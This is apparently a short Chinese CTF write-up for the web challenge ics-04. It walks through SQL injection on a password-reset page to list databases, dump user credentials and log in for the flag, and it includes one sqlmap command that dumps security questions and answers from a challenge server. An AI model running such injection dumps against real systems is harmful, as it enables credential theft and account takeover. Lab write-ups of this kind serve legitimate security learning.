攻防世界web高手进阶区ics-04

攻防世界web高手进阶区ics-04

这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是:
https://blog.csdn.net/harry_c/article/details/98540820
写得粗糙多多见谅

实操

1、使用命令进行sql注入,猜解到4个数据库
cetc004
information_schema
mysql
performance_schema
攻防世界web高手进阶区ics-04_第1张图片2、打出列表
攻防世界web高手进阶区ics-04_第2张图片3、根据列表打出用户名和密码

攻防世界web高手进阶区ics-04_第3张图片攻防世界web高手进阶区ics-04_第4张图片就得到了用户名和密码
4、
回到题目用这个用户名和密码登录得到flag
攻防世界web高手进阶区ics-04_第5张图片5、没事做也可以打出密保的问题和答案,把密码直接改了。
sqlmap -u “http://111.198.29.45:48845/findpwd.php” --data=“username=a” -D cetc004 -T user -C “question,answer” --dump

你可能感兴趣的:(攻防世界web高手进阶区ics-04)